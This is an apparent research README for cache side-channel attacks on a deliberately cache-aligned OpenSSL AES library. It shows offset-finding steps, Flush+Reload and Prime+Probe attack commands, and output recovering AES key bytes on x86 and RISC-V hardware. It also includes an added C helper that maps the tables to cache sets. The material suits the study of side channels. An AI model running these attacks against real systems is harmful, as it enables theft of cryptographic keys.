# Simple Cache Side-Channel Attacks (CSCAs)

Compile with `make`.
Note that the GCC option `-O2` is necessary for the Prime+Probe 8 attack.

The AES last round attack implementation (`src/attack_aes_sync.c`, `src/victim_aes`) is adapted from [https://github.com/jinb-park/crypto-side-channel-attack], and replacing the Flush+Reload Prime+Probe.

## AES

Source code `aes/` is taken from [OpenSSL tag:OpenSSL_1_1_1k](https://github.com/openssl/openssl/tree/OpenSSL_1_1_1k), which is the last tag before `1_1_1-stable`.

Modifications:
- Adapt includes
- Remove include of `opensslconfig.h`
- Align `libaes.so/Te`s to a 64-byte boundary (the beginning of a cache line) in order to simplify the attack

Note:
- In the default configuration, AES is built without the `AES_ASM`, `OPENSSL_AES_CONST_TIME`, and `FULL_UNROLL` options.

Test:
- `src/test_aes.c` is inspired by [tiny-AES-c](https://github.com/kokke/tiny-AES-c), which verifies AES against the data in:
[National Institute of Standards and Technology Special Publication 800-38A 2001 ED](http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-38a.pdf) Appendix F: Example Vectors for Modes of Operation of the AES.

Run:

```
$ LD_LIBRARY_PATH=. ./test_aes.elf

  key:        2b7e151628aed2a6abf7158809cf4f3c
  plaintext:  6bc1bee22e409f96e93d7e117393172a
  ciphertext: 3ad77bb40d7a3660a89ecaf32466ef97
  ECB Encrypt: encrypted plaintext:  3ad77bb40d7a3660a89ecaf32466ef97
  SUCCESS!
  ECB Decrypt: decrypted ciphertext: 6bc1bee22e409f96e93d7e117393172a
  SUCCESS!
```

## Cache Attack Util

Source code `cache/` is partially taken from [Mastik Toolkit 0.02](https://cs.adelaide.edu.au/~yval/Mastik/).

Modification:
- Add RISC-V ISA assembly

## Cache Profiling

```
$ ./cache_profiling_hit.elf
$ ./cache_profiling_fr.elf
$ ./cache_profiling_pp1.elf 0
$ ./cache_profiling_pp8.elf 0

```

## AES Synchronous Known Data Attack

Available attacks (configure with macros):
- Attack type
  - Last round attack
  - First round attack (make with `-WITH_ATTACK_FIRSTROUND`; these are not included in the Makefile yet)
- Cache eviction strategy
  - Flush+Reload
  - Prime+Reload (1 way / 8 ways)
  - Prime+Prime (1 way / 8 ways)
- Victim access strategy
  - single process (victim inside attacker)
  - shared memory

### Prepare

Find the Te0-3 offsets for the attacker. As the library is publicly available, we suppose that the attacker can find these offsets without problem.

```
$ nm libaes.so | grep Te

  0000000000003440 r Te0
  0000000000003040 r Te1
  0000000000002c40 r Te2
  0000000000002840 r Te3
```
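
The following C program is an added example, not part of this repository: it parses the `nm` output above and reports, for each `Te` table, whether it is cache-line aligned, how many lines it spans, and which cache set it starts in. It assumes 1 KiB tables (256 four-byte entries), the 64-byte line and 64-set cache mentioned in this README, and a page-aligned (4 KiB) mapping of the library so that file offsets and load addresses share their low 12 bits; `parse_te_tables` and `sets_covered` are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

#define LINE_SIZE  64u   /* cache line size in bytes (README: 64-byte boundary) */
#define NUM_SETS   64u   /* sets in the cache Prime+Probe 8 is designed for */
#define TABLE_SIZE 1024u /* assumption: 256 entries x 4 bytes per Te table */

/* Sample input: the `nm libaes.so | grep Te` output quoted in the README. */
static const char NM_SAMPLE[] = "0000000000003440 r Te0\n0000000000003040 r Te1\n"
                                "0000000000002c40 r Te2\n0000000000002840 r Te3\n";

struct te_table { char name[8]; unsigned first_set, lines; int aligned; };

/* Parse nm lines "<hex offset> <type> <symbol>", keeping only Te0..Te3. */
int parse_te_tables(const char *nm_out, struct te_table *out, int max) {
    int n = 0;
    for (const char *p = nm_out; *p && n < max; ) {
        unsigned long off; char type, sym[8];
        if (sscanf(p, "%lx %c %7s", &off, &type, sym) == 3 && strlen(sym) == 3 &&
            sym[0] == 'T' && sym[1] == 'e' && sym[2] >= '0' && sym[2] <= '3') {
            struct te_table *t = &out[n++];
            strcpy(t->name, sym);
            t->aligned = (off % LINE_SIZE) == 0; /* unaligned tables straddle an extra line */
            t->first_set = (unsigned)((off / LINE_SIZE) % NUM_SETS);
            t->lines = (unsigned)((off % LINE_SIZE + TABLE_SIZE + LINE_SIZE - 1) / LINE_SIZE);
        }
        p += strcspn(p, "\n");  /* skip to the end of this line */
        if (*p) p++;
    }
    return n;
}

/* Number of distinct cache sets that hold at least one table line. */
unsigned sets_covered(const struct te_table *t, int n) {
    unsigned char seen[NUM_SETS] = {0};
    unsigned count = 0;
    for (int i = 0; i < n; i++)
        for (unsigned l = 0; l < t[i].lines; l++) {
            unsigned s = (t[i].first_set + l) % NUM_SETS;
            if (!seen[s]) { seen[s] = 1; count++; }
        }
    return count;
}

int main(void) {
    struct te_table t[4];
    int n = parse_te_tables(NM_SAMPLE, t, 4);
    printf("%d tables, %u of %u sets hold Te data\n", n, sets_covered(t, n), NUM_SETS);
    return 0;
}
```

For the offsets above this reports 4 tables covering 64 of 64 sets: the four aligned tables span 16 lines each and together occupy every set of such a cache exactly once.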

### Victim

Command line mode (only allows one single argument):

```
$ LD_LIBRARY_PATH=. ./victim_aes.elf 6bc1bee22e409f96e93d7e117393172a

  3ad77bb40d7a3660a89ecaf32466ef97
```

Shared memory mode:

Shared memory is managed by the `status` variable (instead of a semaphore).

```
$ LD_LIBRARY_PATH=. ./victim_aes_shmem.elf &
$ ./test_victim_aes_shmem.elf
```

### Flush+Reload

```
$ LD_LIBRARY_PATH=. ./attack_aes_lastround_fr.elf 03440 03040 02c40 02840 1000 50

  (Usage: <Offset_Te0> <Offset_Te1> <Offset_Te2> <Offset_Te3> <samples> <threshold>)

$ LD_LIBRARY_PATH=. ./victim_aes_shmem.elf &
$ ./attack_aes_lastround_fr_shmem.elf 03440 03040 02c40 02840 3000 140

  [Attacker] Prediction success 14 byte (total 16).

  Note: - Recover 4-9 byte with 1000 plaintext
```

### Prime+Probe 1

It is designed for a direct-mapped cache, and will probably not give any results on a normal machine.

```
$ LD_LIBRARY_PATH=. ./attack_aes_lastround_pp1.elf 03440 03040 02c40 02840 1000 50

$ LD_LIBRARY_PATH=. ./victim_aes_shmem.elf &
$ ./attack_aes_lastround_pp1_shmem.elf 03440 03040 02c40 02840 1000 120
```

### Prime+Probe 8

It is designed for an 8-way associative, 64-set cache.

```
$ LD_LIBRARY_PATH=. ./attack_aes_lastround_pp8.elf 03440 03040 02c40 02840 1000 200

$ LD_LIBRARY_PATH=. ./victim_aes_shmem.elf &
$ ./attack_aes_lastround_pp8_shmem.elf 03440 03040 02c40 02840 1000 1000
```

### On Rocket Chip

```
$ LD_LIBRARY_PATH=. ./attack_aes_lastround_pp1.elf 01740 01b40 01f40 02340 1000 40

  [Attacker] Prediction success 16 byte (total 16).

  Note: - Cache profiling pp1 shows that when no conflict pp1 takes 12 cycles (97%), with conflict 37 cycles (98%).

$ LD_LIBRARY_PATH=. ./attack_aes_lastround_pp8.elf 01740 01b40 01f40 02340 3000 320

  [Attacker] Prediction success 16 byte (total 16).

  Note: - with 1000 plaintext: 7-11 byte
        - with l1_probe + l1_probe (instead of l1_bprobe, which probes backward): 3-6 byte
        - threshold: 320 seems to be the best threshold for 1000 plaintext.
                     If use 3000 plaintext then thresh can be set from 290 - 330.
                     Cache profiling pp8 shows that when no conflict 272 cycles (96%), with conflict >= 297.

$ LD_LIBRARY_PATH=. ./attack_aes_lastround_pp1r.elf 01740 01b40 01f40 02340 1000 30

  [Attacker] Prediction success 16 byte (total 16).

$ LD_LIBRARY_PATH=. ./victim_aes_shmem.elf &
$ LD_LIBRARY_PATH=. ./attack_aes_lastround_pp1r_shmem.elf 01740 01b40 01f40 02340 3000 80

  Note: - attack needs libaes.so, because it uses RELOAD techniques
        - Recovery once 5 byte with 3000 plaintext (takes too long to execute)

$ LD_LIBRARY_PATH=. ./victim_aes_shmem.elf &
$ LD_LIBRARY_PATH=. ./attack_aes_lastround_pp8r_shmem.elf 01740 01b40 01f40 02340 3000 80
```

## AES Asynchronous Attack

```
$ LD_LIBRARY_PATH=. ./attack_aes_async_fr.elf
```